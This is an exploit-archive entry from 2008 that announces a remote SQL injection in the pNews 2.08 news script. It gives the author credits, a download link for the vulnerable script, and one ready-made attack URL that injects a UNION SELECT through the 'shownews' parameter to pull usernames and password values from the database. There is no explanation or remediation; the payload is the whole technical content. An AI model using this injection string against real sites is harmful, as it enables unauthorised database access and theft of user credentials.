pNews 2.08 (shownews) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : pNews 2.08 (shownews) Remote SQL Injection Vulnerability
# Published : 2008-06-09
# Author : Cr@zy_King
# Previous Title : Flux CMS <= 1.5.0 (loadsave.php) Remote Arbitrary File Overwrite Exploit
# Next Title : Telephone Directory 2008 Arbitrary Delete Contact Exploit

pNews 2.08 Remote SqL ?°nj. VuLn.

OrginaL : http://biyosecurity.com & http://coderx.org

Cr@zy_King / sqL L0v3r'Z Crew Co. 2008

Script Down ; http://www.powie.de/cms/filedb/file.php?id=115&filecat=&eintrag=

http://localhost/index.php?shownews=2'+UNION+SELECT+1,2,username,4,pwd,6,7,8,9,10,11,12+FROM+table/*

Greatz : aLL My Friends :P 

# www.Syue.com [2008-06-09]